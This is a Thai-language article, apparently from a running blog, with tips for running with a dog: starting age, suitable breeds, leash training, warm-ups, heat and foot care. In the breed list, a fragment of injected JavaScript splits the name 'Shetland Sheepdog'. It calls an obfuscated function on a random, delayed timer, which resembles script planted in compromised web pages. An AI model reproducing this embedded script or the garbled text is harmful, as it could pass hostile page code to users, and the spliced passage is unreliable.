คำถามที่มักจะถามกันบ่อยในหมู่นักวิ่งที่มีน้องหมา อยากจะวิ่งกับน้องหมาที่รักหรือมีน้องหมาเป็นเพื่อนวิ่งอยู่แล้ว อย่างเช่น ต้องอายุเท่าไหร่ถึงจะวิ่งได้ ต้องสังเกตน้องหมาอย่างไรว่าเขาเหนื่อย ร่างกายมีอุณหภูมิสูงต้องหยุด เหนื่อยหมดแรงไม่ไหว พันธุ์นี้เหมาะกับการวิ่งหรือไม่และจะป้องกันเท้าเขาได้อย่างไร
ทิปง่ายๆ ที่จะช่วยให้คุณวิ่งกับน้องสี่ขาสนุกมากขึ้น
1. การเตรียมพร้อมคือกุญแจสำคัญ ระบบกระดูกของสุนัขทั่วไปจะพัฒนาเต็มที่เมื่อมีอายุครบ 1 ปี นั้นคือเวลาที่แนะนำให้สามารถออกวิ่งได้ และเหมือนกับมนุษย์ การจะวิ่งระยะไกลได้จำเป็นต้องมีการฝึกซ้อม ในปีแรกๆ แนะนำให้ฝึกการเดินและวิ่งข้างกายเจ้านาย เดินและสลับการวิ่งประมาณ 100-200 เมตร เป็นระยะๆ ในช่วงแรกๆ หลังจากนั้นก็ค่อยๆ พัฒนาการฝึกค่อยๆ เพิ่มระยะวิ่งขึ้นและเดินลดลง
สายพันธุ์ใหญ่จะเป็นเพื่อนนักวิ่งได้ดี อย่างเช่น สายพันธุ์วิซสลา (Vizsla) หรือพันธุ์ดัลเมเชี่ยน (Dalmatian) จะเป็นนักวิ่งแต่โดยกำเนิด นำออกวิ่งและฝึกได้ง่าย แต่สำหรับสายพันธุ์ปั๊ก (Pug) และบูลล์ด็อก (Bulldog) จะไม่เหมาะเพราะมีปัญหาเกี่ยวกับระบบการหายใจ ส่วนสายพันธุ์เล็กทีเป็นเพื่อนนักวิ่งได้ก็อย่างเช่น พันธุ์เทอร์เรีย (Terriers) เชทแลนด์ ชีพด็อก (Shetlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Sheepdog) และชิวาวา (Chihuahua)
2. ฝึกควบคุมสุนัขก่อนออกสนามใหญ่ เพราะการออกไปวิ่งบนท้องถนนไม่ได้มีคุณคนเดียว แต่มีเพื่อนนักวิ่ง มีรถยนต์ มอไซด์และจักรยานวิ่งสวนไปมา น้องหมาจะอยู่ในสภาพสิ่งแวดล้อมที่มีการกระตุ้นมาก เจ้าของต้องมีความรับผิดชอบมากขึ้น ดังนั้นในช่วงฝึกเบื้องต้นให้เชื่อง ฝึกให้เชื่อฟังคำสั่งและการคุ้นชินกับสภาพแวดล้อม อาจจะต้องมีอุปกรณ์เสริมอย่างที่รัดคอและสายชักจูง เป็นต้น การพาออกเดินในช่วงแรกๆ เพื่อให้ชินกับสภาพเส้นทางและผู้คน สภาพสิ่งแวดล้อมที่ต้องเจอขณะออกวิ่ง จากนั้นก็ค่อยๆ เดินสลับวิ่ง การฝึกจะใช้เวลาแน่นอน จะมากหรือน้อยก็ขึ้นอยู่กับสายพันธุ์และการฝึก จนเมื่อปรับสภาพได้ก็ค่อยให้น้องหมาวิ่งตัวเปล่าเคียงข้างเรา
3. ฝึกวอร์มอัพก่อนออกวิ่ง การวอร์มอัพน้องหมาอาจจะไม่ใช่การฝึกแบบนักวิ่ง แต่เป็นกรทำกิจกรรมอะไรสักอย่างที่เป็นรูทีน เพื่อให้น้องหมาลดความตื่นเต้นลง อาจจะเป็นการผูกเชือกชักจูงแล้วพาเดินรอบบ้านสักสามรอบก่อนออกถนนใหญ่ก็ได้ แนะนำสายจูงยาวประมาณ 2-3 เมตร เพื่อให้น้องมีอิสระในการเคลื่อนไหวที่มากขึ้น
4. วิ่งกับน้องหมาจงมีสมาธิเพิ่มมากขึ้น จงเป็นนักสังเกตให้มากกว่าเดิม เพราะน้องหมาจะถูกกระตุ้นด้วยสิ่งแวดล้อมรอบตัว ไม่ว่าจะเป็นคนที่เดินผ่านไปมา ผู้ใหญ่และเด็กเล็ก คนปั่นจักรยาน นักวิ่งด้วยกัน และที่สำคัญคือเหล่าสุนัขที่อยู่ข้างนอกด้วย จงระวังและสังเกตุพฤติกรรมน้องหมาให้ดี เจ้าของต้อง take action เพื่อควบคุมน้องหมาก่อนเสมอเมื่อเห็นว่าเหตุการณ์จะไม่ดีแน่ๆ
5. เช็คดูอุณหภูมิ การวิ่งกับสุนัขจะเหมาะมากถ้าวิ่งในช่วงอุณหภูมิต่ำ ประมาณ -10 – 15 องศา แต่คงไม่ได้แน่ๆ ในเมืองไทย ถ้าจะวิ่งในเมืองร้อนจงมองหาร่มเงาให้น้องหมา การวิ่งในสวนสาธารณะ เป็นต้น อย่าวิ่งในสภาพแดดออก น้องหมาจะระบายอาการร้อนได้ช้ามาก เพราะน้องไม่มีต่อมระบายเหงื่อเหมือนมนุษย์
สังเกตอาการเหนื่อยให้ดี อย่าง ไม่ยอมวิ่ง หายใจถี่และมีเสียง น้ำลายไหลยืดยาว ต้องหยุดวิ่งและควรให้น้ำ
6. วิ่งพื้นถนนที่นิ่ม อย่างเช่นพื้นหญ้า พื้นทรายตามชายหาด พื้นถนนลูกรังที่ไม่แข็งเกินไป และระวังพื้นถนนแข็งๆ โดยเฉพาะพื้นลาดยางจะทำให้ฝ่าเท้าน้องหมาถลอกได้ง่าย
สำหรับใครที่พาน้องหมาออกวิ่งสัก 2-3 ครั้งต่ออาทิตย์ ก็ไม่จำเป็นต้องให้อาหารเพิ่มเติม แต่ถ้าสังเกตแล้วมีอาการหิวและน้ำหนักลดลง ก็ควรเพิ่มอาหารเข้าไป นอกจากนี้น้องหมาก็มีอาการปวดเมื่อยกล้ามเนื้อได้เหมือนกัน (DOMS) สังเกตการเคลื่อนไหวดูก็บอกได้ว่าคล้ายๆ กับเรานั้นแหละครับ
อ้างอิง www.runtastic.com